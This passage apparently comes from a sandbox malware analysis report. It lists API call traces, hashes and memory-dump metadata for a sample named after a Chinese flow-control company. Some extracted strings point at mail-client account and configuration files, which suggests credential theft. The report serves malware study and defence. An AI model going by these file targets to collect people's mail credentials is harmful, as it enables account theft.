                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 33561090
                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 335610B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 3594823470-0
                                                                                                    • Opcode ID: fa904e04567c9bbc087ec78fb5f6292bbc03d97647b126e6fab7f24fd53f1fcc
                                                                                                    • Instruction ID: 3353bc9bb13525bba02b4d5557b0a5d1f0cb3f310f62190ba754aa3725d183d1
                                                                                                    • Opcode Fuzzy Hash: fa904e04567c9bbc087ec78fb5f6292bbc03d97647b126e6fab7f24fd53f1fcc
                                                                                                    • Instruction Fuzzy Hash: 97218375900318ABCF50DA65EC48DEF377CEF84328F505656E895A71A1EE309B86CB40
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,33563518,335623F1,33561F17), ref: 33563864
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 33563872
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 3356388B
                                                                                                    • SetLastError.KERNEL32(00000000,?,33563518,335623F1,33561F17), ref: 335638DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: 5531665f6a87ab54614647606ab702d6141c756831c246b0ab4c30eabbc0483c
                                                                                                    • Instruction ID: aa2b8375776fd5857de1949003d822f757902f0b0400e139920b9c5110dbaec0
                                                                                                    • Opcode Fuzzy Hash: 5531665f6a87ab54614647606ab702d6141c756831c246b0ab4c30eabbc0483c
                                                                                                    • Instruction Fuzzy Hash: 6101F776A0AB115EF2002A7AFC88D862BE8EBB677D720323DF010A54F0EF1158038380
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,33566C6C), ref: 33565AFA
                                                                                                    • _free.LIBCMT ref: 33565B2D
                                                                                                    • _free.LIBCMT ref: 33565B55
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,33566C6C), ref: 33565B62
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,33566C6C), ref: 33565B6E
                                                                                                    • _abort.LIBCMT ref: 33565B74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: a02a570f49d50412c85742d7d1c4a1b27bf42e9c318053b73d4f9d3c14a36408
                                                                                                    • Instruction ID: 575526fabe6d66a7fa5efd55a2d1263c7f788cf595b48a6072866ba8fd1fe5ba
                                                                                                    • Opcode Fuzzy Hash: a02a570f49d50412c85742d7d1c4a1b27bf42e9c318053b73d4f9d3c14a36408
                                                                                                    • Instruction Fuzzy Hash: F3F0F2759C4B01ABD3523E34BC08F0E17B98FD15BDB682D18F956B7590FE2088434165
                                                                                                    APIs
                                                                                                      • Part of subcall function 33561E89: lstrlenW.KERNEL32(?,?,?,?,?,335610DF,?,?,?,00000000), ref: 33561E9A
                                                                                                      • Part of subcall function 33561E89: lstrcatW.KERNEL32(?,?,?,335610DF,?,?,?,00000000), ref: 33561EAC
                                                                                                      • Part of subcall function 33561E89: lstrlenW.KERNEL32(?,?,335610DF,?,?,?,00000000), ref: 33561EB3
                                                                                                      • Part of subcall function 33561E89: lstrlenW.KERNEL32(?,?,335610DF,?,?,?,00000000), ref: 33561EC8
                                                                                                      • Part of subcall function 33561E89: lstrcatW.KERNEL32(?,335610DF,?,335610DF,?,?,?,00000000), ref: 33561ED3
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3356122A
                                                                                                      • Part of subcall function 3356173A: _strlen.LIBCMT ref: 33561855
                                                                                                      • Part of subcall function 3356173A: _strlen.LIBCMT ref: 33561869
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                    • Opcode ID: 261fd3d2de30452527ae9d5e880ceb93d811a191649ed2ef7fbb46c31c21e5a7
                                                                                                    • Instruction ID: 823291819d30c2960e908f9375123a26c3026450b17b7aecb30bc22ab9c25246
                                                                                                    • Opcode Fuzzy Hash: 261fd3d2de30452527ae9d5e880ceb93d811a191649ed2ef7fbb46c31c21e5a7
                                                                                                    • Instruction Fuzzy Hash: E021A2B9E103086AEB1097A0FC81FFE7339EF80718F401556FA04EB1D0EAB15E818759
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                    • wsprintfW.USER32 ref: 00404A9A
                                                                                                    • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s$&B
                                                                                                    • API String ID: 3540041739-2907463167
                                                                                                    • Opcode ID: bde7a8dffae819bc06fe2be630a266a01d8c69a4eef698d78f136fb9ac7b6d1c
                                                                                                    • Instruction ID: ab388700b69d78aa859054a1700c1a1d69e67ce61d201efd873ebc4ad7f6fd90
                                                                                                    • Opcode Fuzzy Hash: bde7a8dffae819bc06fe2be630a266a01d8c69a4eef698d78f136fb9ac7b6d1c
                                                                                                    • Instruction Fuzzy Hash: 4F11D8736441282BDB00656D9C45E9F328DDB85334F154237FA25F71D1EA78CC2286E9
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406283
                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                    • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406297
                                                                                                    • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 004062AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: *?|<>/":
                                                                                                    • API String ID: 589700163-165019052
                                                                                                    • Opcode ID: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                    • Instruction ID: 01726bbc4e2c448ec391ae67e872290cbd2d47d18a3812a7b55dff680105d5d8
                                                                                                    • Opcode Fuzzy Hash: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                    • Instruction Fuzzy Hash: F511AB1580061295DB313B549C44B77A2F8EF99790F5240BFED96B32C0E7BC5C9286BD
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                                                                    • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                                                                    • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                    • String ID: 8
                                                                                                    • API String ID: 1453599865-4194326291
                                                                                                    • Opcode ID: 670ee7b5490c677f5f659b485134598271d45b614e600b4a2b45cb0bab07c41e
                                                                                                    • Instruction ID: d62a850ae7ae8d252436c59f910a95d891cc4c78108d860f1a787b3ec39cc5b5
                                                                                                    • Opcode Fuzzy Hash: 670ee7b5490c677f5f659b485134598271d45b614e600b4a2b45cb0bab07c41e
                                                                                                    • Instruction Fuzzy Hash: 6A01B971A44204FFD700AFB09E89EAF7278EF51719F20043BB102B61D1C2BC4D41962D
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,33564AEA,?,?,33564A8A,?,33572238,0000000C,33564BBD,00000000,00000000), ref: 33564B59
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 33564B6C
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,33564AEA,?,?,33564A8A,?,33572238,0000000C,33564BBD,00000000,00000000,?,33562082), ref: 33564B8F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 59b6a930d2954c068954e2d0827059fd3f1360aec616ecdc388eba7e1fdc1796
                                                                                                    • Instruction ID: 9a697db5720083429f05521bb2f6cffe8001322dcf1e80e9957fabb56036359d
                                                                                                    • Opcode Fuzzy Hash: 59b6a930d2954c068954e2d0827059fd3f1360aec616ecdc388eba7e1fdc1796
                                                                                                    • Instruction Fuzzy Hash: 78F0AF71901208BFCB11AF94D808F9DBFF9EF08366F4011A8F805B2161EB758982CB90
                                                                                                    APIs
                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                                                                      • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                      • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                    • String ID:
                                                                                                    • API String ID: 1941528284-0
                                                                                                    • Opcode ID: 9a76f258c171755f82fb3be27d8a42dc7cbb0b331fc04bebc01a9be84b2c0181
                                                                                                    • Instruction ID: 76b650aa9cc6b75c6122964d1cb95a98820e0ebeeaa58c8a998697c6af8370a7
                                                                                                    • Opcode Fuzzy Hash: 9a76f258c171755f82fb3be27d8a42dc7cbb0b331fc04bebc01a9be84b2c0181
                                                                                                    • Instruction Fuzzy Hash: 6A41A371904509BACF117BB5CC45DAF36B9EF05368F20423BF421B21E1D73C8A419A6E
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 3356715C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3356717F
                                                                                                      • Part of subcall function 335656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33565702
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 335671A5
                                                                                                    • _free.LIBCMT ref: 335671B8
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 335671C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: 21c8c119f5d4fcc4125f6d7452d8f4cd2553db0de33af81774f2ffcdc97ec0db
                                                                                                    • Instruction ID: 6e7a67d61125e1e86f1107617c40c0cd10d9dab3fe18fb317b02847b2f4ac172
                                                                                                    • Opcode Fuzzy Hash: 21c8c119f5d4fcc4125f6d7452d8f4cd2553db0de33af81774f2ffcdc97ec0db
                                                                                                    • Instruction Fuzzy Hash: B201ACB76057557FA3111ABAAC4CD7B6AADDEC2EA8354152BBD04D7200EE758C0382B0
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1912718029-0
                                                                                                    • Opcode ID: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                                                                    • Instruction ID: 973325e0aa9a645a651b6ee30753ebbcc0ecd75d5609573519e3086a48bf95c6
                                                                                                    • Opcode Fuzzy Hash: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                                                                    • Instruction Fuzzy Hash: 31113A71904008FEEF229F90DE89EAE3B79FB54348F104476FA05B11A0D3B59E51EA69
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,3356636D,33565713,00000000,?,33562249,?,?,33561D66,00000000,?,?,00000000), ref: 33565B7F
                                                                                                    • _free.LIBCMT ref: 33565BB4
                                                                                                    • _free.LIBCMT ref: 33565BDB
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33565BE8
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33565BF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: d2560b6d6f88b2f1ae115d4d593e9380b6f9c1c0309e28db42f779f605522fb7
                                                                                                    • Instruction ID: 587c72790f668d747e7c70cd62d220a8a89a0575b4d35ec697fd43fab73d362d
                                                                                                    • Opcode Fuzzy Hash: d2560b6d6f88b2f1ae115d4d593e9380b6f9c1c0309e28db42f779f605522fb7
                                                                                                    • Instruction Fuzzy Hash: 0901F9765C5B01A7E2022E34BC44D0F2ABD9BC25BC7542C2CF857B7261EE6088034164
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,335610DF,?,?,?,00000000), ref: 33561E9A
                                                                                                    • lstrcatW.KERNEL32(?,?,?,335610DF,?,?,?,00000000), ref: 33561EAC
                                                                                                    • lstrlenW.KERNEL32(?,?,335610DF,?,?,?,00000000), ref: 33561EB3
                                                                                                    • lstrlenW.KERNEL32(?,?,335610DF,?,?,?,00000000), ref: 33561EC8
                                                                                                    • lstrcatW.KERNEL32(?,335610DF,?,335610DF,?,?,?,00000000), ref: 33561ED3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 493641738-0
                                                                                                    • Opcode ID: f5e1cb7980f1ed045e47632af3278cc43fdc55ced031aa7cd8f94fae57e42c19
                                                                                                    • Instruction ID: 20923f18547929e73c4b70e75411e0b90e58c7fc5a0a7a22dcf7adfec5ce051b
                                                                                                    • Opcode Fuzzy Hash: f5e1cb7980f1ed045e47632af3278cc43fdc55ced031aa7cd8f94fae57e42c19
                                                                                                    • Instruction Fuzzy Hash: 6FF0E9265002107AD221375AEC85E7F7BBCEFC5B70F440019F508A3180FB54584383B5
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 335691D0
                                                                                                      • Part of subcall function 3356571E: HeapFree.KERNEL32(00000000,00000000,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?), ref: 33565734
                                                                                                      • Part of subcall function 3356571E: GetLastError.KERNEL32(?,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?,?), ref: 33565746
                                                                                                    • _free.LIBCMT ref: 335691E2
                                                                                                    • _free.LIBCMT ref: 335691F4
                                                                                                    • _free.LIBCMT ref: 33569206
                                                                                                    • _free.LIBCMT ref: 33569218
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: b17709c53035e90155c93c73b8a927d9993f5771549d61f664ea5925977bf75c
                                                                                                    • Instruction ID: 33ead1081d74ce2dcbea97ac22d3f33f4c6633da071dba88f8665d9e50fa8b3c
                                                                                                    • Opcode Fuzzy Hash: b17709c53035e90155c93c73b8a927d9993f5771549d61f664ea5925977bf75c
                                                                                                    • Instruction Fuzzy Hash: C8F062B195428497C620EF54F5C5C5ABBE9EA407693E82C05F80AE7D00CB30F8818AA0
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                    • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                    • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                    • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00401D44
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                    • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808545654-0
                                                                                                    • Opcode ID: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                                                                    • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                                                                    • Opcode Fuzzy Hash: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                                                                    • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 3356536F
